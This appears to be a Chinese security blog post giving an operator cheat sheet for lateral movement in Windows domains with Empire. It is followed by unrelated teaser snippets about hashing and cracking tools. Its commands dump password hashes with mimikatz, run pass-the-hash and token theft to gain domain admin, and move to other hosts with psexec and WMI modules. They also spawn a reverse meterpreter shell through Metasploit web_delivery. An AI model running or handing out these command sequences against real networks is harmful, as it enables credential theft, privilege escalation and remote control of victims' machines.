横向移动相关

VSole2022-05-08 06:31:56

#001 获取密码hash

1、内置mimikatz:

mimikatz    #执行会有点缓慢,执行成功即可抓取hash

2、creds命令:

creds

creds<空格>+<双击tab键> 可以看到扩展命令

当内网很复杂,hash很多时,可以通过export导出为csv文件


crds export /root/hash    #会自动添加文件后缀

结果如下:

#002 横向移动模块

1、令牌窃取配合hash传递:

①执行mimikatz后

creds    #列出所有Empire获取到的密码

②当发现列举出的creds中,有域高权限用户时,使用hash传递方式攻击:


pth

然后就能看见PID号,窃取该PID进程的令牌即可


steal_token

即可成功获取域管权限

2、横向移动常用模块:

①invoke-psexec:

usemodule lateral_movement/invoke_psexec
set ComputerName <目标计算机名>
set Listener <监听器名称>

成功会返回目标机器的agent会话

②invoke-wmi:

usemodule lateral_movement/invoke_wmi
set ComputerName <目标计算机名>
set Listener <监听器名称>

成功会返回目标机器的agent会话

③其他模块根据实际情况选用即可

usemodule lateral_movement/    #tab键列出模块

#003  转为MSF会话

Invoke-MetasploitPayload<-->web_delivery(MSF):

①MSF执行


use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_http
set lhost
set lpotr <监听端口>
exploit

②Empire执行:

usemodule code_execution/invoke_metasploitpayload
set URL
execute

执行成功后,MSF会上线一个新的meterpreter会话

hash
本作品采用《CC 协议》,转载必须注明作者和本文链接
//oldTab:引用扩容前的哈希表。//oldCap:表示扩容前的table数组的长度。//获得旧哈希表的扩容阈值。//newThr:扩容之后下次触发扩容的条件。//条件成立说明hashMap中的散列表已经初始化过了,
一般翻译做“散列”,也有直接音译为“哈希”的,就是把任意长度的输入,通过散列算法,变换成固定长度的输 出,该输出就是散列值。
Perfetch Hash Cracker是一款基于Rust开发的强大暴力破解工具,该工具可以帮助广大研究人员通过爆破的形式破解prefetch哈希。
随着攻防演练的频繁和?们安全意识的提升,企业内部Windows主机的?令也设置的较为复杂,经 常拿到windows 服务器的时候,获取到了hash,但是?法解密出密码的情况,这时候就需要?法,攻击者不需要花费时间来怼hash进?02测试环境Windows server 2012 ?先需要获取ntml hash,由于直接从内存读取到的可能是密码修改之前的hash,这?些远程命令的执??持wmi,默认开启,且windows 默认不会将wmi 的操作记录到?具的原理是wmi 创建进程执?impacket 中的smbexec 程序,命令如下python3 smbexec.py -hashes
Wavecrack是一款针对密码安全的强大工具,该工具提供了一个用户友好的Web接口,该工具支持预定义的配置,并能够在多个用户之间共享hashcat破解信息,然后使用hashcat实现密码破解。?hashcatFlaskCelerySQLiterabbitmq-serverhashcat规则字典文件?首先,我们需要使用下列命令将该项目源码克隆至本地:git?安装RabbitMQ服务器和python-ldap依赖:$?开启RabbitMQ服务器:$ sudo service rabbitmq-server start. 工具首页添加一个待破解的哈希查看结果和其他状态信息?本项目的开发与发布遵循GNU开源许可证协议。?
笔者在对volatility工具进行了解后,对分析vmem文件的手法进行了一定优化,可以提升解决锁屏问题的效率。不过官方团队并没有打包volatility3的可执行程序,原因写的是打包出来的packages会被识别为恶意软件,解决了这个问题就会出可执行程序了。过程思路一、直接在esxi中部署volatility3项目Linux环境下的esxi,这个思考很快就被证明不太可行了,volatility3需要多个系统库和pip库:yum install zlib &&\yum install zlib-devel &&\yum install bzip2-devel &&\yum install ncurses-devel &&\yum install sqlite-devel &&\yum install readline-devel &&\yum install gcc &&\yum install libffi &&\yum install libffi-devel &&\yum install gcc-c++\yum install openssl-devel\yum install tk-devel
虽然加密技术新辈多出,但哈希算法(也称“散列算法”)自诞生以来,已成为加密算法领域不可或缺的应用。 最简单的散列算法也被用来加密存在数据库中的密码字符串,日常我们在各大APP中注册时填写的密码均是以字符串方式保存在服务器中,用户登陆时需要再次对输入密码实施哈希计算,而后将两个密码字符串进行碰撞验证登陆。
内网渗透hash窃取技巧
2021-11-28 06:53:23
在内网渗透的过程中,最重要的就是信息搜集,但是在极端情况下我们找不到能够横或者跨域的机器,那么这时候我们就可以尝试做一个水坑,来尝试获取hash。当然这只是理想情况,在愈发强调对抗的当下,利用水坑钓鱼也变得不是那么简单。
我们知道HashMap底层是由数组+链表/红黑树构成的,当我们通过put(key, value)向hashmap中添加元素时,需要通过散列函数确定元素究竟应该放置在数组中的哪个位置,当不同的元素被放置在了数据的同一个位置时,后放入的元素会以链表的形式,插在前一个元素的尾部,这个时候我们称发生了hash冲突。
VSole
网络安全专家